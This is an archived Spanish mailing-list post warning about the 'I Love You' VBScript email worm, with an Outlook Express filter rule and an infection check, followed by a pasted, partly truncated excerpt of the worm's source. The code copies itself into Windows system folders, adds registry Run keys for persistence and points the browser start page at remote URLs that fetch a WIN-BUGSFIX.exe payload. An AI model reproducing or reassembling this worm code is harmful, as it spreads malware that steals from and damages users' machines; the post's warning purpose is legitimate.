[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[escepticos] Sobre el virus I Love You

Buenas

En este mismo momento se esta propagando bastante a saco el virus "I Love You" un nuevo tipo de virus basado en VBScript y que se ejcuta automaticamente al abrir el mensaje que lo contenga... esta vez no es un mito, aprovecha la caracteristica de mostar mensajes en html del outlook exprés para ejecutar el código Visual Basic Script y a partir de ahí, ya tiene via libre para hacer todo tipo de maldades...

Para estar protegido frente a este virus, es imprescindible crear un filtro que mande los msg que recibamos con "I love you" en el asunto directamente a la basura, o mejor, que los borre del servidor

para ello:

herramientas->reglas de mensajes->correo->nueva...

-mesajes que el asunto contenga "I love"

-eliminarlo del servidor

es importante crear este filtro puesto que puede darse la casualidad que el msg que contiene el virus sea el ultimo recibido, y en ese caso puede que se habra automaticamente al cambiar de carpeta (cuidao que no es cabroncete casi el virus este)

para saber si ya estais infectados, buscar el archivo

LOVE-LETTER-FOR-YOU.TXT.vbs

si os aparece en el directorio windows o windows/sistem... mal rollito. En unas horas supongo que habrá disponible una cura para el virus, pero por ahora, nada, o por lo menos nada seguro al 100%

Los que useis netscape o otros programas que no sean de microsoft seguramente estareis libres de peligro, y los usuarios de linux freebsd desde luego también...


Por si os interesa, el codigo del virus es el siguiente:

rem  barok -loveletter(vbe) <i hate go to school>
rem  by: spyder / ispyder en mail.com /  en GRAMMERSoft Group / Manila,Philippines
 
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
 
main()
 
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
 
-sub regruns()
-On Error Resume Next
-Dim num,downread
-regcreate
-"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 ",dirsystem&"\MSKernel32.vbs"
-regcreate
-"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi n32DLL",dirwin&"\Win32DLL.vbs"
-downread=""
-downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
-if (downread="") then
-downread="c:\"
-end if
-if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
-Randomize
-num = Int((4 * Rnd) + 1)
-if num = 1 then
-regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.deja.com/-[ST_artlink=www.skyinet.net]/jump/http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
-elseif num = 2 then
-regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.deja.com/-[ST_artlink=www.skyinet.net]/jump/http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
-elseif num = 3 then
-regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.deja.com/[ST_artlink=www.skyinet.net]/jump/http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
-elseif num = 4 then
-regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.deja.com/-[ST_artlink=www.skyinet.net]/jump/http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX .exe"
-end if
-end if
-if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI X",downread&"\WIN-BUGSFIX.exe"
-regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
-end if
-end sub
 
-sub listadriv
-On Error Resume Next
-Dim d,dc,s
-Set dc = fso.Drives
-For Each d in dc
-If d.DriveType = 2 or d.DriveType=3 Then
-folderlist(d.path&"\")
-end if
-Next
-listadriv = s
-end sub


Saludos

Javier Marí
jamc en ctv.es
http://www.ctv.es/USERS/jamc
Sinaptic en el IRC